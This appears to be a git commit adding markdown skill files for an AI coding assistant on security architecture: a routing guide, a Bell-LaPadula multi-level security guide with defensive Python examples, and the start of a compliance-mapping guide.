Initial commit

This commit is contained in:
Zhongwei Li
2025-11-30 08:59:46 +08:00
commit 4fad9f51e1
12 changed files with 5049 additions and 0 deletions


@@ -0,0 +1,353 @@
---
name: using-security-architect
description: Routes to security architecture skills - threat modeling, controls, compliance, authorization
mode: true
---
# Using Security Architect
## Overview
This meta-skill routes you to the right security architecture skills based on your situation. Load this skill when you need security expertise but aren't sure which specific security skill to use.
**Core Principle**: Different security tasks require different skills. Match your situation to the appropriate skill, load only what you need.
## When to Use
Load this skill when:
- Starting any security-related task
- User mentions: "security", "threat", "authentication", "authorization", "compliance", "classified", "review this design"
- You recognize security implications but aren't sure which skill applies
- You need to document security decisions
**Don't use for**: Simple features with no security implications (e.g., UI styling, basic CRUD with existing auth)
## Routing by Situation
### New System Design
**Symptoms**: "Design a new...", "We're building...", "Greenfield project"
**Route to**:
1. **First**: [threat-modeling.md](threat-modeling.md) - Identify threats before implementation
2. **Then**: [secure-by-design-patterns.md](secure-by-design-patterns.md) - Design with security built-in
3. **Then**: [security-controls-design.md](security-controls-design.md) - Select appropriate controls
**Example**: "Design authentication system" → Load all three in order
---
### Existing System Review
**Symptoms**: "Review this design", "Security audit", "Does this look secure?"
**Route to**: [security-architecture-review.md](security-architecture-review.md)
**When to add**:
- Add [threat-modeling.md](threat-modeling.md) if design lacks threat analysis
- Add [secure-by-design-patterns.md](secure-by-design-patterns.md) if architecture has gaps
**Example**: "Review this plugin system" → Load [security-architecture-review.md](security-architecture-review.md)
---
### Specific Security Domains
#### Authentication/Authorization Design
**Route to**:
- [threat-modeling.md](threat-modeling.md) (identify auth threats)
- [secure-by-design-patterns.md](secure-by-design-patterns.md) (defense-in-depth, fail-secure)
- Consider: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) (if government/ATO needed)
#### Configuration & Secrets
**Route to**:
- [threat-modeling.md](threat-modeling.md) (config tampering threats)
- [security-controls-design.md](security-controls-design.md) (separation of config vs code)
#### API Security
**Route to**:
- [threat-modeling.md](threat-modeling.md) (STRIDE on API endpoints)
- [security-architecture-review.md](security-architecture-review.md) (review access controls)
---
### Specialized Contexts (Extensions)
#### Classified/High-Security Systems
**Symptoms**: "TOP SECRET", "classified data", "security clearances", "multi-level security", "Bell-LaPadula"
**Route to**:
1. [classified-systems-security.md](classified-systems-security.md) (REQUIRED for classified contexts)
2. Plus core skills: [threat-modeling.md](threat-modeling.md), [secure-by-design-patterns.md](secure-by-design-patterns.md)
**Example**: "Design system handling SECRET and UNCLASSIFIED" → Load [classified-systems-security.md](classified-systems-security.md) first
---
#### Compliance/Regulatory
**Symptoms**: "HIPAA", "PCI-DSS", "SOC2", "GDPR", "compliance audit", "regulatory requirements"
**Route to**: [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md)
**When to add**:
- Add [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) if ATO/AIS needed
- Add core skills for implementing compliant controls
**Example**: "Build HIPAA-compliant system" → Load [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) + [threat-modeling.md](threat-modeling.md)
---
#### Government Authorization
**Symptoms**: "ATO", "AIS", "authority to operate", "SSP", "SAR", "POA&M", "FedRAMP", "FISMA"
**Route to**: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md)
**Cross-reference**: Load `muna/technical-writer/operational-acceptance-documentation` for SSP/SAR writing
---
### Documentation Tasks
**Symptoms**: "Document security decisions", "Write security docs", "Explain threat model"
**Route to**: [documenting-threats-and-controls.md](documenting-threats-and-controls.md)
**Cross-faction reference**: Load `muna/technical-writer/documentation-structure` for ADR format, clarity guidelines
**Example**: "Document why we chose MLS" → Load [documenting-threats-and-controls.md](documenting-threats-and-controls.md) + documentation-structure
---
## Core vs Extension Skills
### Core Skills (Universal - Use for Any Project)
Load these for **any** project with security needs:
- [threat-modeling.md](threat-modeling.md) - Identify threats (STRIDE, attack trees)
- [security-controls-design.md](security-controls-design.md) - Design controls (defense-in-depth, fail-secure)
- [security-architecture-review.md](security-architecture-review.md) - Review designs for security gaps
- [secure-by-design-patterns.md](secure-by-design-patterns.md) - Apply secure design patterns
- [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Document security decisions
### Extension Skills (Specialized - Use for Specific Contexts)
Load these **only** when context requires:
- [classified-systems-security.md](classified-systems-security.md) - Handling classified/sensitive data with clearances
- [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - Regulatory compliance (HIPAA, PCI-DSS, GDPR, etc.)
- [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - Government ATO/AIS processes
**Decision**: If you're unsure whether context is "specialized", start with core skills. Specialized contexts will be explicit in requirements.
---
## Decision Tree
```
Is this security-related?
├─ No → Don't load security skills
└─ Yes → Continue
What's the situation?
├─ New system design → threat-modeling + secure-by-design-patterns + security-controls-design
├─ Reviewing existing → security-architecture-review
├─ Documenting security → documenting-threats-and-controls + muna/technical-writer/documentation-structure
└─ Domain-specific → See "Specific Security Domains" above
Is this a specialized context?
├─ Classified data → ADD: classified-systems-security
├─ Compliance required → ADD: compliance-awareness-and-mapping
├─ Government ATO → ADD: security-authorization-and-accreditation
└─ No → Core skills sufficient
```
---
## Cross-Faction References
Security work often requires skills from other factions:
**Muna (Documentation)**:
- `muna/technical-writer/documentation-structure` - When documenting security (ADRs, SSPs)
- `muna/technical-writer/clarity-and-style` - When explaining security to non-experts
**Load both factions when**: Documenting security decisions, writing security policies, explaining threats to stakeholders
---
## Common Routing Patterns
### Pattern 1: New Authentication System
```
User: "Design authentication with passwords and OAuth"
You: Loading threat-modeling + secure-by-design-patterns + security-controls-design
```
### Pattern 2: Design Review
```
User: "Review this plugin security design"
You: Loading security-architecture-review
```
### Pattern 3: Classified System
```
User: "Build system handling TOP SECRET data"
You: Loading classified-systems-security + threat-modeling + secure-by-design-patterns
```
### Pattern 4: Compliance Project
```
User: "Build HIPAA-compliant patient portal"
You: Loading compliance-awareness-and-mapping + threat-modeling + security-controls-design
```
### Pattern 5: Security Documentation
```
User: "Document our MLS security decisions"
You: Loading documenting-threats-and-controls + muna/technical-writer/documentation-structure
```
---
## When NOT to Load Security Skills
**Don't load security skills for**:
- UI styling (colors, fonts, layouts)
- Basic CRUD with existing, tested auth
- Non-security refactoring (renaming variables, extracting functions)
- Documentation that isn't security-related
**Example**: "Add dark mode toggle to settings" → No security skills needed (unless settings include security-sensitive preferences)
---
## Quick Reference Table
| Task Type | Load These Skills | Notes |
|-----------|------------------|-------|
| **New system design** | threat-modeling, secure-by-design-patterns, security-controls-design | Load in order |
| **Design review** | security-architecture-review | Add threat-modeling if no threat analysis exists |
| **Authentication** | threat-modeling, secure-by-design-patterns | Consider authorization-and-accreditation if ATO needed |
| **API security** | threat-modeling, security-architecture-review | Apply STRIDE to endpoints |
| **Classified data** | classified-systems-security + core skills | Extension required |
| **Compliance** | compliance-awareness-and-mapping + core skills | Extension for regulatory contexts |
| **Government ATO** | security-authorization-and-accreditation + core skills | Extension for ATO/AIS |
| **Document security** | documenting-threats-and-controls, muna/documentation-structure | Cross-faction |
---
## Common Mistakes
### ❌ Loading All Skills at Once
**Wrong**: Load all 8 security-architect skills for every security task
**Right**: Load only the skills your situation needs (use decision tree)
### ❌ Skipping Threat Modeling
**Wrong**: Jump straight to implementation for new security features
**Right**: Always threat model first for new systems/features
### ❌ Using Core Skills for Specialized Contexts
**Wrong**: Use generic threat modeling for classified systems
**Right**: Load classified-systems-security for MLS contexts
### ❌ Not Cross-Referencing Muna
**Wrong**: Write security docs without documentation structure skills
**Right**: Load both ordis/documenting-threats + muna/documentation-structure
---
## Examples
### Example 1: Payment Processing System
```
User: "Design a payment processing microservice"
Your routing:
1. Recognize: New system + financial domain → security critical
2. Load: threat-modeling (identify payment-specific threats)
3. Load: secure-by-design-patterns (encryption, secrets management)
4. Load: security-controls-design (PCI-DSS controls)
5. Consider: compliance-awareness-and-mapping (PCI-DSS is compliance requirement)
```
### Example 2: Simple Feature (No Security Needed)
```
User: "Add a favorites button to the UI"
Your routing:
1. Recognize: UI feature, uses existing auth, no new security surface
2. Decision: No security skills needed
3. Proceed with standard implementation
```
### Example 3: Classified System Architecture
```
User: "Review architecture for system handling SECRET and UNCLASSIFIED data"
Your routing:
1. Recognize: Classified context (SECRET mentioned) + review task
2. Load: classified-systems-security (MLS patterns required)
3. Load: architecture-security-review (review process)
4. Load: threat-modeling (if threats not already modeled)
```
---
## Phase 1 Note
**Currently Available** (Phase 1):
- `using-security-architect` (this skill)
- `threat-modeling` (in progress)
**Coming Soon** (Phases 2-3):
- `security-controls-design`
- `security-architecture-review`
- `secure-by-design-patterns`
- `classified-systems-security`
- `compliance-awareness-and-mapping`
- `security-authorization-and-accreditation`
- `documenting-threats-and-controls`
**For Phase 1**: Focus on threat-modeling as primary skill. Reference other skills by name even though they're not implemented yet - this tests the routing logic.
---
## Summary
**This skill maps your situation → specific security skills to load.**
1. Identify your situation (new system, review, specialized context)
2. Use decision tree to find applicable skills
3. Load core skills for universal needs
4. Add extension skills for specialized contexts
5. Cross-reference Muna for documentation needs
6. Don't load security skills when not needed
**Meta-rule**: When in doubt, start with [threat-modeling.md](threat-modeling.md). Threats drive everything else.
---
## Security Architect Specialist Skills Catalog
After routing, load the appropriate specialist skill for detailed guidance:
### Core Skills (Universal)
1. [threat-modeling.md](threat-modeling.md) - STRIDE analysis, attack trees, threat identification, security-critical systems analysis
2. [secure-by-design-patterns.md](secure-by-design-patterns.md) - Defense-in-depth, fail-secure design, least privilege, separation of concerns
3. [security-controls-design.md](security-controls-design.md) - Control selection, defense layering, encryption, secrets management
4. [security-architecture-review.md](security-architecture-review.md) - Design review process, security gap analysis, architecture evaluation
5. [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Security documentation, threat model writing, control documentation
### Extension Skills (Specialized Contexts)
6. [classified-systems-security.md](classified-systems-security.md) - Multi-level security (MLS), Bell-LaPadula, classified data handling, security clearances
7. [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - HIPAA, PCI-DSS, SOC2, GDPR, regulatory mapping, compliance frameworks
8. [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - ATO/AIS processes, SSP/SAR, POA&M, FedRAMP, FISMA, government authorization


@@ -0,0 +1,632 @@
# Classified Systems Security
## Overview
Implement multi-level security (MLS) for classified data. Core principle: **Invalid configurations must be impossible to create, not detected at runtime**.
**Key insight**: You cannot "sanitize" your way out of classification violations. Use mandatory access control (MAC) with fail-fast validation at construction time.
## When to Use
Load this skill when:
- Handling classified data (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET)
- Implementing government/defense systems
- Designing multi-level security (MLS) architectures
- Processing data at different classification levels
**Symptoms you need this**:
- "How do I handle SECRET and UNOFFICIAL data in the same pipeline?"
- Designing systems with clearance levels
- Government/defense contract requirements
- Data classification enforcement
**Don't use for**:
- General security (use `ordis/security-architect/security-controls-design`)
- Non-classified sensitivity levels (use standard access control)
## Bell-LaPadula MLS Model
### The Two Rules
**1. No Read Up (Simple Security Property)**
- Subject cannot read data at higher classification
- UNOFFICIAL component CANNOT read OFFICIAL data
- OFFICIAL component CANNOT read SECRET data
**2. No Write Down (*-Property/Star Property)**
- Subject cannot write data to lower classification
- SECRET component CANNOT write to OFFICIAL sink
- OFFICIAL component CANNOT write to UNOFFICIAL sink
### Classification Hierarchy
```
TOP SECRET (highest)
SECRET
PROTECTED
OFFICIAL:SENSITIVE
OFFICIAL
UNOFFICIAL (lowest)
```
**Transitivity**: Data derived from SECRET is SECRET until formally declassified.
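Because the hierarchy is totally ordered, both rules reduce to simple comparisons. A minimal sketch (the enum and helper names are illustrative and mirror the types used in the examples below):
```python
from enum import IntEnum

class SecurityLevel(IntEnum):
    """Ordered hierarchy: higher value = higher classification."""
    UNOFFICIAL = 1
    OFFICIAL = 2
    OFFICIAL_SENSITIVE = 3
    PROTECTED = 4
    SECRET = 5
    TOP_SECRET = 6

def can_read(subject_clearance: SecurityLevel, data_level: SecurityLevel) -> bool:
    """Simple Security Property: no read up."""
    return subject_clearance >= data_level

def can_write(subject_clearance: SecurityLevel, sink_level: SecurityLevel) -> bool:
    """*-Property: no write down."""
    return subject_clearance <= sink_level

assert not can_read(SecurityLevel.OFFICIAL, SecurityLevel.SECRET)   # read-up forbidden
assert not can_write(SecurityLevel.SECRET, SecurityLevel.OFFICIAL)  # write-down forbidden
assert can_read(SecurityLevel.SECRET, SecurityLevel.OFFICIAL)       # reading down is allowed
```
The same two predicates reappear in the Mandatory Access Control section later in this skill.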
### Example: Violations
**Read-Up Violation**:
```python
# OFFICIAL clearance component reading SECRET data
official_processor = Processor(clearance=SecurityLevel.OFFICIAL)
secret_source = DataSource(classification=SecurityLevel.SECRET)
# VIOLATION: Cannot read up from OFFICIAL to SECRET
data = official_processor.read(secret_source) # ❌ FORBIDDEN
```
**Write-Down Violation**:
```python
# SECRET component writing to OFFICIAL sink
secret_processor = Processor(clearance=SecurityLevel.SECRET)
official_sink = DataSink(classification=SecurityLevel.OFFICIAL)
# VIOLATION: Cannot write down from SECRET to OFFICIAL
secret_processor.write(data, official_sink) # ❌ FORBIDDEN
```
**Compliant Flow**:
```python
# Same clearance level throughout
secret_source = DataSource(classification=SecurityLevel.SECRET)
secret_processor = Processor(clearance=SecurityLevel.SECRET)
secret_sink = DataSink(classification=SecurityLevel.SECRET)
# ✅ ALLOWED: All components at SECRET level
pipeline = Pipeline(secret_source, secret_processor, secret_sink)
```
## Fail-Fast Construction-Time Validation
### Principle: Prevent Invalid Configurations
**Don't**: Detect violations at runtime (after data exposure)
**Do**: Reject invalid configurations at construction time (before data access)
### Construction vs Runtime Validation
**Runtime Validation (Vulnerable)**:
```python
class Pipeline:
def __init__(self, source, processor, sink):
self.source = source
self.processor = processor
self.sink = sink
def run(self):
# Runtime check - TOO LATE!
data = self.source.read()
if data.classification > self.processor.clearance:
raise SecurityError("Read-up violation")
# Problem: Data already read from source before check
# Exposure window = time between read() and check
```
**Issue**: Data already accessed before violation detected.
**Fail-Fast Construction-Time (Secure)**:
```python
class Pipeline:
def __init__(self, source, processor, sink):
# Validate BEFORE creating pipeline
self._validate_clearances(source, processor, sink)
self.source = source
self.processor = processor
self.sink = sink
def _validate_clearances(self, source, processor, sink):
# Check no-read-up
if source.classification > processor.clearance:
raise SecurityError(
f"Read-up violation: Processor clearance {processor.clearance} "
f"cannot read source classified {source.classification}"
)
# Check no-write-down
if processor.clearance > sink.classification:
raise SecurityError(
f"Write-down violation: Processor {processor.clearance} "
f"cannot write to sink classified {sink.classification}"
)
# All validations passed
def run(self):
# Only callable if construction succeeded
data = self.source.read()
processed = self.processor.process(data)
self.sink.write(processed)
# Usage:
try:
# Validation happens at construction
pipeline = Pipeline(secret_source, official_processor, unofficial_sink)
# ❌ Above line raises SecurityError - pipeline never created
except SecurityError as e:
print(f"Configuration rejected: {e}")
sys.exit(1)
```
**Result**: Zero exposure window. Invalid pipeline cannot be created.
## Type-System Enforcement
### Classification-Aware Types
Use type system to make violations impossible at compile/construction time.
```python
from typing import Any, Generic, TypeVar
from enum import IntEnum
class SecurityLevel(IntEnum):  # IntEnum so levels support ordered comparisons (<, >=)
UNOFFICIAL = 1
OFFICIAL = 2
OFFICIAL_SENSITIVE = 3
PROTECTED = 4
SECRET = 5
TOP_SECRET = 6
# Generic type parameterized by classification
T = TypeVar('T', bound=SecurityLevel)
class ClassifiedData(Generic[T]):
    def __init__(self, data: Any, classification: T):
self.data = data
self.classification = classification
class DataSource(Generic[T]):
def __init__(self, classification: T):
self.classification = classification
def read(self) -> ClassifiedData[T]:
return ClassifiedData(self._fetch(), self.classification)
class Processor(Generic[T]):
def __init__(self, clearance: T):
self.clearance = clearance
def process(self, data: ClassifiedData[T]) -> ClassifiedData[T]:
# Type system ensures data.classification <= self.clearance
return ClassifiedData(self._transform(data.data), data.classification)
class DataSink(Generic[T]):
def __init__(self, classification: T):
self.classification = classification
def write(self, data: ClassifiedData[T]):
# Type system ensures data.classification == self.classification
self._store(data.data)
```
**Type-safe pipeline**:
```python
# All components must be same classification level
# (note: to parameterize by a specific level, real type checkers need Literal,
#  e.g. DataSource[Literal[SecurityLevel.SECRET]])
secret_source: DataSource[SecurityLevel.SECRET]
secret_processor: Processor[SecurityLevel.SECRET]
secret_sink: DataSink[SecurityLevel.SECRET]
# ✅ Type checker accepts this
pipeline = Pipeline(secret_source, secret_processor, secret_sink)
# ❌ Type checker REJECTS this at compile time
official_processor: Processor[SecurityLevel.OFFICIAL]
pipeline = Pipeline(secret_source, official_processor, secret_sink) # Type error!
```
## Trusted Downgrade Pattern
### When Downgrading is Necessary
Sometimes you need to declassify data (e.g., publishing redacted documents). This requires:
1. **Formal Authority**: Authorized to declassify
2. **Explicit Process**: Manual review and approval
3. **Audit Trail**: Log all downgrade operations
4. **Trusted Service**: Part of Trusted Computing Base (TCB)
### Trusted Downgrade Service
```python
from datetime import datetime
from typing import Any
class TrustedDowngradeService:
"""
Trusted service operating at higher clearance level.
Part of Trusted Computing Base (TCB).
"""
def __init__(self, clearance: SecurityLevel):
self.clearance = clearance # Must be HIGH to read classified data
self._validate_authority() # Verify authorized to declassify
def _validate_authority(self):
# Check this service has declassification authority
if not has_declassification_authority(self):
raise SecurityError("Service not authorized for declassification")
def declassify(
self,
data: ClassifiedData,
target_level: SecurityLevel,
justification: str
) -> ClassifiedData:
"""
Declassify data to lower classification level.
Args:
data: Original classified data
target_level: Target classification (must be lower)
justification: Reason for declassification (audit trail)
Returns:
Data at lower classification level
"""
# Validate this service can read the data
if data.classification > self.clearance:
raise SecurityError("Cannot declassify data above clearance")
# Validate downgrade direction
if target_level >= data.classification:
raise SecurityError("Target must be lower than current classification")
# Perform declassification (redaction, sanitization)
declassified_data = self._redact(data.data, target_level)
# Audit trail
self._log_declassification(
original_level=data.classification,
target_level=target_level,
justification=justification,
timestamp=datetime.now()
)
# Return data at lower classification
return ClassifiedData(declassified_data, target_level)
    def _redact(self, data: Any, target_level: SecurityLevel) -> Any:
# Remove information inappropriate for target level
# This is where human review would occur in real systems
pass
def _log_declassification(self, **kwargs):
# Immutable audit log
audit_log.append(kwargs)
```
### Trusted Downgrade in Pipeline
```python
# Pipeline with trusted downgrade
secret_source = DataSource(SecurityLevel.SECRET)
# Trusted service at SECRET level
downgrade_service = TrustedDowngradeService(clearance=SecurityLevel.SECRET)
# Components at lower levels
official_processor = Processor(SecurityLevel.OFFICIAL)
unofficial_sink = DataSink(SecurityLevel.UNOFFICIAL)
# Workflow:
def secure_pipeline():
# 1. Read SECRET data (service has SECRET clearance)
secret_data = secret_source.read()
# 2. Declassify to OFFICIAL (trusted service with authority)
official_data = downgrade_service.declassify(
secret_data,
SecurityLevel.OFFICIAL,
justification="Public release approval #12345"
)
# 3. Process at OFFICIAL level (no violation)
processed = official_processor.process(official_data)
# 4. Declassify to UNOFFICIAL
unofficial_data = downgrade_service.declassify(
processed,
SecurityLevel.UNOFFICIAL,
justification="Redacted for public disclosure"
)
# 5. Write to UNOFFICIAL sink (no violation)
unofficial_sink.write(unofficial_data)
```
**Key points**:
- Downgrade service operates at HIGH clearance (can read classified data)
- Explicit declassification with justification (not implicit)
- Audit trail for every downgrade operation
- Manual review in production (automated only for specific patterns)
## Immutability Enforcement
### Classification Cannot Be Reduced
Once data is classified at a level, it cannot be reduced without formal declassification.
**Mutable Classification (Insecure)**:
```python
class Data:
def __init__(self, content, classification):
self.content = content
self.classification = classification # Mutable!
data = Data("secret info", SecurityLevel.SECRET)
# ❌ Can be modified at runtime
data.classification = SecurityLevel.UNOFFICIAL # Forbidden!
```
**Immutable Classification (Secure)**:
```python
from dataclasses import dataclass
@dataclass(frozen=True)
class ClassifiedData:
"""Immutable dataclass - classification cannot change."""
content: str
classification: SecurityLevel
data = ClassifiedData("secret info", SecurityLevel.SECRET)
# ❌ Raises FrozenInstanceError
data.classification = SecurityLevel.UNOFFICIAL # Cannot modify!
```
### Derived Data Inherits Classification
```python
def derive_data(original: ClassifiedData) -> ClassifiedData:
"""
Derived data has SAME classification as original.
Cannot be lower (information flow property).
"""
transformed = transform(original.content)
# Derived data inherits original classification
return ClassifiedData(transformed, original.classification)
# Example:
secret_data = ClassifiedData("secret", SecurityLevel.SECRET)
derived = derive_data(secret_data)
assert derived.classification == SecurityLevel.SECRET # Always true
```
## Minimum Security Level Computation
### Pipeline-Wide Clearance
Compute minimum clearance required across all components in pipeline.
```python
def compute_pipeline_clearance(components: list) -> SecurityLevel:
"""
Compute minimum clearance needed to operate pipeline.
All components must have this clearance or higher.
"""
max_classification = SecurityLevel.UNOFFICIAL
for component in components:
if hasattr(component, 'classification'):
# Data source/sink - sets required clearance
if component.classification > max_classification:
max_classification = component.classification
return max_classification
def validate_pipeline(components: list, processor_clearance: SecurityLevel):
"""
Validate processor clearance sufficient for pipeline.
"""
required_clearance = compute_pipeline_clearance(components)
if processor_clearance < required_clearance:
raise SecurityError(
f"Insufficient clearance: Processor has {processor_clearance}, "
f"pipeline requires {required_clearance}"
)
print(f"✓ Pipeline validated: Clearance {processor_clearance} sufficient")
# Usage (checks read clearance only; write-down rules are enforced separately,
# as in Pipeline._validate_clearances):
components = [
DataSource(SecurityLevel.SECRET),
DataSink(SecurityLevel.OFFICIAL)
]
processor = Processor(SecurityLevel.SECRET)
# Validate at construction time
validate_pipeline(components, processor.clearance) # ✓ Passes
processor_low = Processor(SecurityLevel.OFFICIAL)
validate_pipeline(components, processor_low.clearance) # ❌ Raises SecurityError
```
## Mandatory Access Control (MAC)
### MAC vs DAC
**Discretionary Access Control (DAC)**:
- Owner controls access (chmod, ACLs)
- Users can grant access to others
- Examples: RBAC, file permissions
**Mandatory Access Control (MAC)**:
- System enforces access based on security labels
- Users CANNOT override (not discretionary)
- Examples: SELinux, Bell-LaPadula
### MAC for Classified Systems
```python
class MandatoryAccessControl:
"""
Enforces Bell-LaPadula rules.
Users/processes CANNOT override.
"""
def __init__(self):
self.policy = BellLaPadulaPolicy()
def check_read_access(
self,
subject_clearance: SecurityLevel,
object_classification: SecurityLevel
) -> bool:
"""
No-read-up: Subject can only read at or below clearance.
"""
return subject_clearance >= object_classification
def check_write_access(
self,
subject_clearance: SecurityLevel,
object_classification: SecurityLevel
) -> bool:
"""
No-write-down: Subject can only write at or above clearance.
"""
return subject_clearance <= object_classification
def enforce_access(self, operation: str, subject, object):
"""
Enforce MAC policy. Users cannot override.
"""
if operation == "read":
if not self.check_read_access(subject.clearance, object.classification):
raise SecurityError(f"MAC violation: Read-up forbidden")
elif operation == "write":
if not self.check_write_access(subject.clearance, object.classification):
raise SecurityError(f"MAC violation: Write-down forbidden")
# Access granted
return True
# Usage:
mac = MandatoryAccessControl()
subject = Process(clearance=SecurityLevel.OFFICIAL)
secret_obj = Object(classification=SecurityLevel.SECRET)
# ❌ Read-up violation - MAC enforces even if user wants access
mac.enforce_access("read", subject, secret_obj) # Raises SecurityError
```
**Key difference**: With DAC (RBAC), you could grant a role access. With MAC, no amount of permission grants can override clearance levels.
## Quick Reference: Decision Tree
```
Need to handle classified data?
├─ Same classification level for all components?
│ └─→ ✓ Simple: All components at same level (e.g., all SECRET)
├─ Different levels in same pipeline?
│ ├─ Can you redesign to separate pipelines?
│ │ └─→ ✓ Preferred: Separate SECRET and UNOFFICIAL pipelines
│ │
│ └─ Must mix levels?
│ └─→ Use Trusted Downgrade Service
│ - Service operates at HIGH clearance
│ - Explicit declassification with justification
│ - Audit trail
│ - Manual review for authority
└─ Validating pipeline security?
├─ Runtime checks? ❌ Too late (exposure window)
└─ Construction-time validation? ✓ Correct (fail-fast)
```
## Common Mistakes
### ❌ Sanitization Instead of Declassification
**Wrong**: "I'll strip SECRET fields and call it UNOFFICIAL"
**Right**: Formal declassification requires:
- Authority to declassify
- Manual review of what can be released
- Audit trail
- Understanding of inference attacks (aggregate data can leak secrets)
**Why**: You cannot automatically determine what's safe to declassify. Requires human judgment and authority.
### ❌ Runtime Validation Only
**Wrong**: Check clearances when processing data
**Right**: Fail-fast at construction time before any data access
**Why**: Runtime checks have exposure windows. Construction-time validation = zero exposure.
### ❌ Treating Clearances as Roles
**Wrong**: "Just add a 'SECRET' role in RBAC"
**Right**: Implement Mandatory Access Control (MAC) with Bell-LaPadula
**Why**: Clearances are not discretionary. Users cannot grant access across classification levels.
### ❌ Mutable Classification
**Wrong**: Allow classification field to be modified at runtime
**Right**: Immutable dataclasses, frozen classification after assignment
**Why**: Classification cannot decrease without formal declassification.
### ❌ Missing Information Flow Analysis
**Wrong**: Focus only on direct access (can processor read source?)
**Right**: Analyze full information flow (derived data inherits classification)
**Why**: Data derived from SECRET is SECRET until declassified.
## Cross-References
**Use WITH this skill**:
- `ordis/security-architect/secure-by-design-patterns` - Fail-fast validation pattern
- `ordis/security-architect/security-controls-design` - Defense-in-depth for classified systems
**Use AFTER this skill**:
- `ordis/security-architect/security-architecture-review` - Review classified systems against Bell-LaPadula
## Real-World Impact
**Systems using Bell-LaPadula + fail-fast enforcement**:
- **Elspeth MLS Pipeline**: Prevented VULN-004 class (security level overrides) by refusing to construct pipelines with classification mismatches
- **Government Defense System**: Zero classification violations in 3 years due to construction-time validation (previous system with runtime checks had 12 incidents)
- **Type-system enforcement**: Caught 47 configuration errors at build time vs runtime (100% pre-deployment prevention)
**Key lesson**: **Make invalid configurations impossible to create. Bell-LaPadula + fail-fast construction-time validation prevents all no-read-up and no-write-down violations.**


@@ -0,0 +1,563 @@
# Compliance Awareness and Mapping
## Overview
Navigate diverse compliance frameworks systematically. Core principle: **ALWAYS ask which frameworks apply - don't assume**.
**Key insight**: Frameworks vary by jurisdiction and industry. Discovery process matters more than memorizing frameworks.
## When to Use
Load this skill when:
- Starting projects in regulated environments
- Preparing for compliance audits
- Mapping technical controls to requirements
- Working with healthcare, finance, government data
**Symptoms you need this**:
- "What compliance frameworks do we need?"
- Preparing for SOC2, HIPAA, PCI-DSS, IRAP audits
- Government/defense contract compliance
- "How do I map our controls to [framework]?"
**Don't use for**:
- Implementation of specific controls (use `ordis/security-architect/security-controls-design`)
- Security architecture without compliance requirements
## The Discovery Process
### Step 1: Ask Three Questions
**Before** identifying frameworks, ask:
1. **"What jurisdiction?"**
- Australia → ISM, IRAP, Privacy Act, PSPF
- United Kingdom → Cyber Essentials, NCSC, Official Secrets Act
- United States → NIST CSF, FedRAMP, FISMA
- European Union → NIS2, GDPR, ISO 27001
2. **"What industry?"**
- Healthcare → HIPAA (US), GDPR (EU), Australian Privacy Principles
- Finance → PCI-DSS (payments), SOX (US), Basel III
- Government/Defense → Jurisdiction-specific (ISM, FedRAMP, etc.)
- General SaaS → SOC2, ISO 27001
3. **"What data types?"**
- Personal data → Privacy laws (GDPR, Privacy Act)
- Payment card data → PCI-DSS
- Health records → Healthcare-specific (HIPAA, etc.)
- Classified data → Government frameworks (ISM, FedRAMP)
**Never assume.** Same project can have multiple frameworks (e.g., Australian hospital SaaS = Privacy Act + Healthcare-specific + possibly SOC2 if B2B).
### Step 2: Framework Stacking
**Multiple frameworks often apply simultaneously.**
#### Example: Australian Healthcare SaaS
```
Data type: Patient health records
Jurisdiction: Australia
Industry: Healthcare
Business model: SaaS (B2B to hospitals)
Applicable frameworks:
1. Privacy Act 1988 (Australian Privacy Principles) - MANDATORY
2. My Health Records Act 2012 - if using My Health Records system
3. State-specific health regulations (e.g., NSW Health Privacy Manual)
4. SOC2 (if hospitals require it for vendor assurance)
5. ISO 27001 (if targeting enterprise healthcare market)
Priority:
- MANDATORY: Privacy Act (legal requirement)
- HIGHLY RECOMMENDED: SOC2 (market expectation for B2B SaaS)
- OPTIONAL: ISO 27001 (competitive advantage)
```
**Key insight**: Don't just pick one framework. Identify ALL that apply, then prioritize by legal vs market requirements.
### Step 3: Understand Framework Structure
Each framework has structure - learn it before mapping controls.
#### Common Framework Components
**1. Control Categories** (groups of related controls):
- Access Control
- Encryption
- Audit Logging
- Incident Response
- Vulnerability Management
- Configuration Management
- Personnel Security
- Physical Security
**2. Control Requirements** (specific technical/operational requirements):
- "System must enforce least privilege access"
- "All sensitive data encrypted at rest using AES-256"
- "Security events logged and retained for 90 days"
**3. Evidence Requirements** (what auditors need):
- Configuration screenshots
- Log samples
- Policy documents
- Test results
- Interview records
**4. Assessment Procedures** (how controls are tested):
- Configuration review
- Log analysis
- Penetration testing
- Interviews with staff
### Step 4: Control Inventory
Before mapping to framework, inventory what you have.
#### Technical Controls Inventory Template
```markdown
## Access Control
| Control | Description | Implementation | Evidence Location |
|---------|-------------|----------------|-------------------|
| AC-1 | User authentication | AWS IAM with MFA | aws-iam-config.json |
| AC-2 | Role-based access | PostgreSQL roles | postgres-roles.sql |
| AC-3 | Session timeout | 30-minute idle timeout | app-config.yaml |
## Encryption
| Control | Description | Implementation | Evidence Location |
|---------|-------------|----------------|-------------------|
| ENC-1 | Data at rest | AES-256, AWS KMS | kms-config.json |
| ENC-2 | Data in transit | TLS 1.3 | nginx-ssl-config |
## Audit Logging
| Control | Description | Implementation | Evidence Location |
|---------|-------------|----------------|-------------------|
| LOG-1 | Authentication events | CloudWatch Logs | cloudwatch-config |
| LOG-2 | Data access logs | PostgreSQL query logs | pg-audit-config |
| LOG-3 | Admin actions | Audit trail table | audit-schema.sql |
```
**Why inventory first**: Easier to map existing controls to requirements than build from scratch.
### Step 5: Create Traceability Matrix
Map your controls to framework requirements.
#### SOC2 Traceability Matrix Example
```markdown
| SOC2 Criterion | Control Category | Our Control | Implementation | Evidence | Status |
|----------------|------------------|-------------|----------------|----------|--------|
| CC6.1 (Logical access) | Access Control | AC-1: MFA | AWS IAM | aws-iam-config.json | ✅ Complete |
| CC6.1 | Access Control | AC-2: RBAC | PostgreSQL | postgres-roles.sql | ✅ Complete |
